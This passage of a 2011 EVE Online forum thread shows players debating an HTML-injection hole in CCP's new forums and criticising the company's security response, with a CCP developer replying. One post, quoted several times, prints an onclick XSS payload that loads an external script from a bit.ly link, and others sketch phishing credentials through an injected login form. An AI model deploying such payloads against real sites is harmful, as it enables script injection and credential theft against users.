Smagd
Encina Technologies Namtz' aar K'in
|
Posted - 2011.04.12 08:57:00 -
[121]
Edited by: Smagd on 12/04/2011 08:59:35
Maybe I shouldn't say this, but my confidence is a bit shaken (not stirred).
I can quote at least two historic instances where people have been trying to point CCP to an issue, and no petition would help until someone went to the forums and made it public:
T20's Dev Hax would probably serve as a good example of how not to report issues, but Dark Shikari's Trade Window Scam is certainly an example of a correct way to do it - and it STILL took a forum threadnaught.
At this point I'm not really sure that any "procedures put in place" to make it easier to get CCP to listen actually work.
In the light of the current forum "cookie derp" I may have become a little hard to convince that emails sent to that fancy security email address are treated with any better priority sorting than critical petitions.
Better than "Hey that subject line looks important".
|
Rixiu
The Inuits
|
Posted - 2011.04.12 08:58:00 -
[122]
I'll just leave this here
CCP, I am disappoint
|
Mynas Atoch
Eternity INC. Goonswarm Federation
|
Posted - 2011.04.12 09:05:00 -
[123]
Edited by: Mynas Atoch on 12/04/2011 09:05:52
I hadn't seen it all in one place before, but it's really quite surprising that
a. CCP claim to have invested 72,000 man.hours...
b. to implement an off the shelf open source gplv2'd forum software YAF.net by adding an eve skin and their own account security, ...
c. but failed in its performance of the basic QA expected for any modern Web Application.
Here's a pdf The Open Web Application Security Project. You can print it out and read it at leisure.
|
Trebor Daehdoow
|
Posted - 2011.04.12 09:35:00 -
[124]
Originally by: Yuki Kulotsuki So mittens is king of the piggies?
Well, he is a bit of a ham.
Originally by: Gavjack Bunk Sreeg's Barrel. It's CCP's answer to Schrodinger's Cat. Do we know what state he's in right now?
Inebriation. He either collapses into it, or collapses because of it.
But seriously now, while I thank Sreegs for his report, and his engagement with the community on this and other issues, the real challenge for CCP will be in what comes after the dust has settled -- "what happened" is important, but "why it happened" and "what steps must be taken to prevent it from happening again" are even more important, and it is the answers to those questions which will be the true basis for judgment.
|
Gavjack Bunk
Gallente Genos Occidere HYDRA RELOADED
|
Posted - 2011.04.12 09:39:00 -
[125]
Originally by: Trebor Daehdoow But seriously now, while I thank Sreegs for his report, and his engagement with the community on this and other issues
A meltdown is definitely the best way to remind people that you're human.
|
Hel O'Ween
Men On A Mission
|
Posted - 2011.04.12 09:53:00 -
[126]
What this whole damage control dev blog - and the discussion around it - happily ignores, is the fact that after the forums were taken down the first time and went online again with an assuring "we fixed it, everything's fine now" statement accompanying it, the problems were still there!
Only after another demonstration, they were put offline. How assuring is this for us?
Oh, and thank you very much for making clear that your paying customers are to blame for this, as they didn't write the petitions/bug reports in such a way that you don't have to do the research yourself. I'd suggest you scrap every report that has no compilable code attached to it. Anything else can't be taken serious. -- EVEWalletAware - an offline wallet manager |
Hel O'Ween
Men On A Mission
|
Posted - 2011.04.12 09:55:00 -
[127]
Originally by: Misanth
Communication is not CCP's strongest side, never has been. They misunderstand players, we misunderstand them. They present stuff in a way that aggravates the playerbase, even tho it could easily be made in a more appealing fashion. Etc.
Yeah, Hilmar's words at the FanFest keynote this year come to mind: "We miscommunicated, we didn't communicate at all. We've learned from that." -- EVEWalletAware - an offline wallet manager |
Grimpak
Gallente The Whitehound Corporation Frontline Assembly Point
|
Posted - 2011.04.12 10:01:00 -
[128]
Edited by: Grimpak on 12/04/2011 10:01:01
Originally by: Hel O'Ween What this whole damage control dev blog - and the discussion around it - happily ignores, is the fact that after the forums were taken down the first time and went online again with an assuring "we fixed it, everything's fine now" statement accompanying it, the problems were still there!
Only after another demonstration, they were put offline. How assuring is this for us?
Oh, and thank you very much for making clear that your paying customers are to blame for this, as they didn't write the petitions/bug reports in such a way that you don't have to do the research yourself. I'd suggest you scrap every report that has no compilable code attached to it. Anything else can't be taken serious.
well to be fair, Sreegs is the security guy, not the code guy. that and the fact that it was a weekend also didn't help at all.
Originally by: Trebor Daehdoow But seriously now, while I thank Sreegs for his report, and his engagement with the community on this and other issues, the real challenge for CCP will be in what comes after the dust has settled -- "what happened" is important, but "why it happened" and "what steps must be taken to prevent it from happening again" are even more important, and it is the answers to those questions which will be the true basis for judgment.
tbh from this side's POV this was yet another issue in a long string of issues that have plagued EVE lately where it seems that either QA didn't look at it or there is no QA at all. ---
Quote: The more I know about humans, the more I love animals.
ain't that right. |
Super Whopper
I can Has Cheeseburger
|
Posted - 2011.04.12 10:09:00 -
[129]
Edited by: Super Whopper on 12/04/2011 10:09:53
Originally by: Trebor Daehdoow "what happened"
That thing called excellence, which CCP kept going on about, was exposed in all its glory. Now you may wonder why not a single blog has used that word in months.
Originally by: Hel O'Ween Yeah, Hilmar's words at the FanFest keynote this year come to mind: "We miscommunicated, we didn't communicate at all. We've learned from that."
The only thing CCP have learned is how to use the CSM to string us along.
Originally by: Grimpak tbh from this side's POV this was yet another issue in a long string of issues that have plagued EVE lately where it seems that either QA didn't look at it or there is no QA at all.
Lately, since 2003.
|
Kristina Vanszar
Caldari
|
Posted - 2011.04.12 10:19:00 -
[130]
The DEV BLOG,
not at risk, sorry guys this must be a joke, as you've said, it was possible to include HTML. Who would prevent me from adding a div, which looks exactly like your login one, make it be at exactly the same position as the original one, containing an iframe with the login form itself, and gather some login information???
Sorry, but I do not think that account information has not been at risk...
Just as a side tip, PLEASE check that it is not possible to execute server side commands, like SHELLs and stuff....
|
|
Grimpak
Gallente The Whitehound Corporation Frontline Assembly Point
|
Posted - 2011.04.12 10:20:00 -
[131]
Originally by: Super Whopper Lately, since 2003.
I was actually talking about the rumoured contractual SNAFU that happened when Iceland went **** up that kicked out half of the QA department, but you can go that way too, saying this game is a failure from day 0. why are you playing tho? ---
Quote: The more I know about humans, the more I love animals.
ain't that right. |
Kepakh
|
Posted - 2011.04.12 11:04:00 -
[132]
Originally by: Kristina Vanszar
Who would prevent me from adding a div, which looks exactly like your login one, make it be at exactly the same position as the original one, containing an iframe with the login form itself, and gather some login information???
I am not particularly sure how you would be gathering any information just by adding a div and no script working...
|
Kristina Vanszar
Caldari
|
Posted - 2011.04.12 11:06:00 -
[133]
Originally by: Kepakh
Originally by: Kristina Vanszar
Who would prevent me from adding a div, which looks exactly like your login one, make it be at exactly the same position as the original one, containing an iframe with the login form itself, and gather some login information???
I am not particularly sure how you would be gathering any information just by adding a div and no script working...
A div with an iframe, which contains a fully functional login form, hosted from another website. Which is asking you to log in to the forums. there are plenty of users not thinking twice, who would just enter the credentials.
|
RaTTuS
BIG Gentlemen's Agreement
|
Posted - 2011.04.12 11:08:00 -
[134]
it was still limited to 500 characters
|
Kepakh
|
Posted - 2011.04.12 11:09:00 -
[135]
Originally by: Kristina Vanszar
A div with an iframe, which contains a fully functional login form, hosted from another website. Which is asking you to log in to the forums. there are plenty of users not thinking twice, who would just enter the credentials.
No script, no data sent anywhere...?
|
Kristina Vanszar
Caldari
|
Posted - 2011.04.12 11:17:00 -
[136]
Standard HTML element, which is showing you ANOTHER website
See: iFrame
The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.
|
Jimmae
|
Posted - 2011.04.12 11:19:00 -
[137]
Edited by: Jimmae on 12/04/2011 11:23:55
Originally by: Kepakh
Originally by: Kristina Vanszar
A div with an iframe, which contains a fully functional login form, hosted from another website. Which is asking you to log in to the forums. there are plenty of users not thinking twice, who would just enter the credentials.
No script, no data sent anywhere...?
We have a proverb where I come from: "If you don't have a clue just shut the f*ck up."
You don't need Javascript to trigger an HTTP Post Request. All you need is a <form> tag.
Besides that, not being able to inject a <script> tag doesn't mean I can not inject script through other ways. onclick for example can be an easy way, so can be a href.
|
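The cases argued over in the posts above (a `<form>` tag, an `onclick` attribute, an `href`, an iframe) are all markup that does harm without a `<script>` tag, which is why a post filter is normally an allowlist rather than a script blocklist. This is an added example, not part of any post in the thread and not CCP's or YAF.net's code; the allowed-tag policy, the `sanitize_post` name and the sample inputs are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed policy for illustration: the only markup a forum post may contain.
ALLOWED_TAGS = {"b", "i", "u", "em", "strong", "p", "br", "blockquote", "a"}
ALLOWED_ATTRS = {"a": {"href"}}      # every other attribute (onclick, style, ...) is dropped
ALLOWED_SCHEMES = {"http", "https"}  # rejects javascript:, data: and relative URLs
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style", "iframe", "form"}  # element and its content removed


def safe_url(value):
    """True only for absolute http(s) URLs."""
    try:
        return urlsplit((value or "").strip()).scheme.lower() in ALLOWED_SCHEMES
    except ValueError:
        return False


class PostSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.open_tags, self.skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1  # an unclosed dropped element swallows the rest (fails closed)
        elif not self.skip and tag in ALLOWED_TAGS:
            kept = "".join(
                f' {name}="{escape(value, quote=True)}"'
                for name, value in attrs
                if name in ALLOWED_ATTRS.get(tag, ()) and safe_url(value)
            )
            self.out.append(f"<{tag}{kept}>")
            if tag not in VOID_TAGS:
                self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in self.open_tags:
            while self.open_tags:  # close any tags left open inside this one
                closed = self.open_tags.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))  # text is always re-escaped


def sanitize_post(html_text):
    parser = PostSanitizer()
    parser.feed(html_text)
    parser.close()
    parser.out.extend(f"</{t}>" for t in reversed(parser.open_tags))
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed inputs mirroring the cases argued over in the thread.
    for sample in (
        '<b>Hi</b><form action="https://collector.example/x"><input name="pw">Log in</form>',
        '<p onclick="x()">text</p>',
        '<a href="javascript:x()">link</a>',
    ):
        print(repr(sample), "->", repr(sanitize_post(sample)))
```

Unknown tags are dropped while their text is kept and re-escaped, so the output can only ever contain the tags and attributes named in the policy.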
Kristina Vanszar
Caldari
|
Posted - 2011.04.12 11:25:00 -
[138]
Originally by: Jimmae Edited by: Jimmae on 12/04/2011 11:23:55
Originally by: Kepakh
Originally by: Kristina Vanszar
A div with an iframe, which contains a fully functional login form, hosted from another website. Which is asking you to log in to the forums. there are plenty of users not thinking twice, who would just enter the credentials.
No script, no data sent anywhere...?
We have a proverb where I come from: "If you don't have a clue just shut the f*ck up."
You don't need Javascript to trigger an HTTP Post Request. All you need is a <form> tag.
Besides that, not being able to inject a <script> tag doesn't mean I can not inject script through other ways. onclick for example can be an easy way, so can be a href.
This ^^ Thank you :-)
|
Miso Hawnee
|
Posted - 2011.04.12 11:26:00 -
[139]
If I performed like this at work, I would be fired and possibly in jail.
Maybe there is no IT equivalent to the NEC, maybe there are no standards or structure to it at all. I doubt this though, you don't go to college and learn Information Technology because it's an inane science.
Oh hi ya we forgot to ground your 480v system, but we assure that it is working now. Never mind your line worker that is break dancing every time he touches a control desk. In fact, I recommend you fire that worker for bringing our incompetence to light.
|
Kepakh
|
Posted - 2011.04.12 11:45:00 -
[140]
Originally by: Kristina Vanszar Standard HTML element, which is showing you ANOTHER website
See: iFrame
The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.
Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.
|
|
Jimmae
|
Posted - 2011.04.12 11:52:00 -
[141]
Edited by: Jimmae on 12/04/2011 11:56:09
Originally by: Kepakh
Originally by: Kristina Vanszar Standard HTML element, which is showing you ANOTHER website
See: iFrame
The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.
Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.
Did you even read what he wrote?
1. I present you with an injected login form. 2. You fill out said form. 3. It sends your credentials to me. 4. ??? 5. PROFIT
PS: Remember the proverb!
PPS: A very simple example on how to include a .js file from an external source using an onclick handler: <div onclick="(s=(d=document).createElement('script')).src='www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">
Edit: Why do I always type onlick? Gotta be something Freudian.
|
Kristina Vanszar
Caldari
|
Posted - 2011.04.12 11:53:00 -
[142]
Edited by: Kristina Vanszar on 12/04/2011 11:56:15
Originally by: Kepakh
Originally by: Kristina Vanszar Standard HTML element, which is showing you ANOTHER website
See: iFrame
The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.
Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.
WRONG! an iframe is nothing more than you opening another website, in this particular case, without knowing it.
@ Jimmae, not 1000 % sure, but should work too, 'cause you're jumping over the check and are creating the script "in runtime"
|
|
CCP Sreegs
|
Posted - 2011.04.12 11:55:00 -
[143]
Originally by: Kristina Vanszar The DEV BLOG,
not at risk, sorry guys this must be a joke, as you've said, it was possible to include HTML. Who would prevent me from adding a div, which looks exactly like your login one, make it be at exactly the same position as the original one, containing an iframe with the login form itself, and gather some login information???
Sorry, but I do not think that account information has not been at risk...
Just as a side tip, PLEASE check that it is not possible to execute server side commands, like SHELLs and stuff....
Iframes were not possible. Only a limited subset of HTML was. The investigation is still ongoing but we have no reason to believe that spawning a shell or server compromise was possible either. |
|
|
CCP Sreegs
|
Posted - 2011.04.12 11:57:00 -
[144]
Originally by: Jimmae Edited by: Jimmae on 12/04/2011 11:56:09
Originally by: Kepakh
Originally by: Kristina Vanszar Standard HTML element, which is showing you ANOTHER website
See: iFrame
The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.
Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.
Did you even read what he wrote?
1. I present you with an injected login form. 2. You fill out said form. 3. It sends your credentials to me. 4. ??? 5. PROFIT
PS: Remember the proverb!
PPS: A very simple example on how to include a .js file from an external source using an onclick handler: <div onclick="(s=(d=document).createElement('script')).src='www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">
Edit: Why do I always type onlick? Gotta be something Freudian.
This code was not possible either. |
|
Kepakh
|
Posted - 2011.04.12 11:59:00 -
[145]
Originally by: Jimmae
1. I present you with an injected login form.
It is still the web server that determines if your injection will be passed or not and how the result will be displayed.
There is no evidence that handler as such would be working. You only state your speculations as facts.
|
Jimmae
|
Posted - 2011.04.12 12:01:00 -
[146]
Originally by: CCP Sreegs
Originally by: Jimmae Edited by: Jimmae on 12/04/2011 11:56:09
Originally by: Kepakh
Originally by: Kristina Vanszar Standard HTML element, which is showing you ANOTHER website
See: iFrame
The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.
Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.
Did you even read what he wrote?
1. I present you with an injected login form. 2. You fill out said form. 3. It sends your credentials to me. 4. ??? 5. PROFIT
PS: Remember the proverb!
PPS: A very simple example on how to include a .js file from an external source using an onclick handler: <div onclick="(s=(d=document).createElement('script')).src='www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">
Edit: Why do I always type onlick? Gotta be something Freudian.
This code was not possible either.
I am glad to hear that! It is one of the most basic examples and doesn't even try masking itself.
|
Kristina Vanszar
Caldari
|
Posted - 2011.04.12 12:01:00 -
[147]
K sreegs, thanks for the info, i changed all passwords i had, just in case.
can i ask you something: Please guys if you find out that something has gone terribly wrong, and **** could hit the fan very badly.
let us know, so we can prepare ourselves if that's the case, saying everything is fine and hoping no one will find out is just a bad idea.
If you are 1000000 % sure, nothing could've happened, let us know too, but with a detailed description why....
Br, o7
BTW: i've filled out the BH form and haven't got any response till now.
|
|
CCP Sreegs
|
Posted - 2011.04.12 12:03:00 -
[148]
Originally by: mazzilliu apparently the guy who first reported the issue and later got banned said that his initial exploit report was incomplete, but there was no ccp effort to get him to elaborate.
perhaps it would be an improvement to have some sort of followup for security related reports, in case the reporter does not understand how to properly demonstrate an exploit, to try to get him to communicate clearly, rather than brush them off as another incomplete bug report or potential troll. i think if that happened the forums might have gone down some time sooner.
I cannot comment on individual administrative actions as a matter of policy. This unfortunately also leaves me in a position where I cannot counter your speculation, except to point to the steps outlined in the blog and let you know that we really don't want to ban people from EVE. |
|
kakmonstret
|
Posted - 2011.04.12 12:03:00 -
[149]
Edited by: kakmonstret on 12/04/2011 12:05:20
Originally by: Jimmae
Originally by: Kepakh
Originally by: Kristina Vanszar Standard HTML element, which is showing you ANOTHER website
See: iFrame
The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.
Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.
Did you even read what he wrote?
1. I present you with an injected login form. 2. You fill out said form. 3. It sends your credentials to me. 4. ??? 5. PROFIT
PS: Remember the proverb!
PPS: A very simple example on how to include a .js file from an external source using an onclick handler: <div onlick="(s=(d=document).createElement("script")).src='www.bit.ly/123';d.getElementsByTagName('body')">[0].appendChild(s)">
Okay people have you ever done stuff like this? Regarding the above example a filter to filter out js will hopefully catch that. Now this being the CCP webdev clowns we can't be too sure.
Regarding frames they can load any other content on the web. If CCP doesn't have some very interesting check on their server that loads the iframe target and checks for js there it would not be able to do anything. In any way there is no way CCP can filter content on a remote site loaded in a frame. Because that content is *not* loaded by their server, instead it is only loaded by your browser. If the server does a check for frames and check their target the only thing it can do is to remove the frame completely. That such a check exists I would say is very unlikely.
Edit: And all nice theory was blown away by no frames allowed. Well well nice try.
|
Kristina Vanszar
Caldari
|
Posted - 2011.04.12 12:08:00 -
[150]
Originally by: kakmonstret
Originally by: Jimmae
Originally by: Kepakh
Originally by: Kristina Vanszar Standard HTML element, which is showing you ANOTHER website
See: iFrame
The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.
Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.
Did you even read what he wrote?
1. I present you with an injected login form. 2. You fill out said form. 3. It sends your credentials to me. 4. ??? 5. PROFIT
PS: Remember the proverb!
PPS: A very simple example on how to include a .js file from an external source using an onclick handler: <div onlick="(s=(d=document).createElement("script")).src='www.bit.ly/123';d.getElementsByTagName('body')">[0].appendChild(s)">
Okay people have you ever done stuff like this? Regarding the above example a filter to filter out js will hopefully catch that. Now this being the CCP webdev clowns we can't be too sure.
Regarding frames they can load any other content on the web. If CCP doesn't have some very interesting check on their server that loads the iframe target and checks for js there it would not be able to do anything. In any way there is no way CCP can filter content on a remote site loaded in a frame. Because that content is *not* loaded by their server, instead it is only loaded by your browser. If the server does a check for frames and check their target the only thing it can do is to remove the frame completely. That such a check exists I would say is very unlikely.
If the Frame element family was filtered by the Signature checks then it couldn't do any harm, i didn't want my accounts banned or even trouble with my RL company going to hell because of an attack with CCP as target without a contract to do so, so i didn't test it.
I hope Frames were not possible.